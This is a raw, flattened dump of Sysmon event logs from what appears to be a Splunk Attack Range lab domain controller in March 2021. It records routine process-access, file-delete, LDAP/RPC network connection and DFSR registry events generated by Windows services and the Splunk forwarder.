Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7D464C7E3184F9F33FF0B276C8BF17,SHA256=B8C2AE4F466DEB84DEA52A19C0466161F612470554A1B9C0EDD1C22C78F5882E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:10.666{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D41F6597B8AC813952CAFCF10591DECC,SHA256=A7F742ED793F68EAE56BDA79F71D02F726896BC78D425FF2DDBF8A0DAF4264AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:11.713{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE71927BA71EB9D201676BE6BFE82379,SHA256=2F61171671B2F695407800872813E21E02047F638E64E8804293589440B96E8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:12.759{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494D9F3AB88CC89155B4C02CB7796EB6,SHA256=3D12D1BE9F1BF69FF2F7A8C20A285582561530E61AACFE03E10188358AFDFA57,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:10.631{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53734-false10.0.1.12-8000- 23542300x800000000000000011584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:13.791{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6629D6E290E302BDC6D2F6931352AABF,SHA256=EA36C0F2F4A38C2B6D6B0215B4256ABAE63790524E9BE3E18D5A2D2A1FF87286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:14.869{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9856AB7206C7089A630CFF630138FF59,SHA256=FDAC26AE9EB858F4CF869E72794A09E779E7E62FACDBD4269CFB296A02069034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.915{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C3C0ACD48B44F474AF0FC8AAA464196,SHA256=DA7BD176F02E4AA1B80D9A714AD78D60134E98303F46D6546C679ACE5765CD43,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:14.584{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53735-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000011591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:14.584{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53735-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 13241300x800000000000000011590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:15.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x800000000000000011589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:15.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Config SourceDWORD (0x00000001) 13241300x800000000000000011588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:15.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_D1286CDE-9764-40EF-8307-AEB9B8BDF7DB.XML 23542300x800000000000000011587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.181{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FDB88912528EC3773FBC41D75D7DB07,SHA256=17D6E9D139F71D15B888A537163DBF09439FE94F05E68530FCB3EBF121C9A033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.181{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=144752BC0472DACA8D8774E8A17E7BEB,SHA256=43CE44012AC45F18C9587E3A6B7D7A220544259573A5567E691E87DD259560E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.946{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96840A49704F202F265C799BBEA0CB84,SHA256=5CFFDB53CD583387997CB1EDDEEB20AA18B30661DC33191DB456362D94069E62,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.642{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53739-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.642{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53739-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.636{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53738-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.636{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53738-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.626{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53737-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.626{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53737-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.616{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53736-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000011598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.616{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53736-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 13241300x800000000000000011597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:16.228{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x800000000000000011596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:16.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Config SourceDWORD (0x00000001) 13241300x800000000000000011595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:16.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_D1286CDE-9764-40EF-8307-AEB9B8BDF7DB.XML 23542300x800000000000000011594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.212{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FDB88912528EC3773FBC41D75D7DB07,SHA256=17D6E9D139F71D15B888A537163DBF09439FE94F05E68530FCB3EBF121C9A033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:17.962{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C479F8F8065A05663B4EB41DAF1C781,SHA256=247617C58ADC5DA634E0889D0A26D91AB90CA0C6DE4105DDFA183438047A7627,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.654{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53742-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.654{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53742-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.647{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53741-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.646{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53741-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x800000000000000011608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:17.243{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5653A52F646D9CDEC3911C6CE7C2F705,SHA256=0204A28A07C88DB2F20CDC4EEB1D843CA06FDD99D59D4756026FFBD26F2D4BF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53740-false10.0.1.12-8000- 23542300x800000000000000011614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:18.978{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0D291538DC353210103FB63DC3770E,SHA256=8280B8807E1B610B8D8C712AEFD39AAC7C6BC523045193A2D9F97C2EE27372A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:19.993{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4098B7438395D8001ACFC98A9B4CEBF9,SHA256=04980D4730D48DE727188608AC78C5D93EC34CCA53E0D55DDF53ADBEADE2D3D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:21.009{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F0AA4EFF2A8CBB5FE686FA9CD309D9,SHA256=54484C12EF652B044A10F089A21591445010441ED5FC812CE2A8D47F7224BC6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:21.646{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53743-false10.0.1.12-8000- 23542300x800000000000000011617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:22.009{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCFC736397956F24DFCDD1CDFB3D69C8,SHA256=6ACE645FABD2037E528E8EA63A9142E14E0CE1437561D70550B9DF64AD457669,IMPHASH=00000000000000000000000000000000falsetrue